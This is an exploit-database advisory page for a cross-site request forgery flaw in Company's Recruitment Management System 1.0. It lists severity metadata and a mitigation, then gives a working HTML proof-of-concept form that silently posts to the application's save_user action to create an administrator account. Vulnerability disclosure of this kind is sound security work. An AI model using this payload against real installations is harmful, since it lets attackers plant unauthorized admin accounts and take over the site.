Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)

vendor:

Company's Recruitment Management System

by:

Aniket Anil Deshmane

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Company's Recruitment Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:company's_recruitment_management_system

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, XAMPP

2021

Company’s Recruitment Management System 1.0 – ‘Add New user’ Cross-Site Request Forgery (CSRF)

The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.

Mitigation:

Implementing a security token to prevent CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP

Detail:
The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.

CSRF POC:-


<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"
method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Test" />
<input type="hidden" name="username" value="Test" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>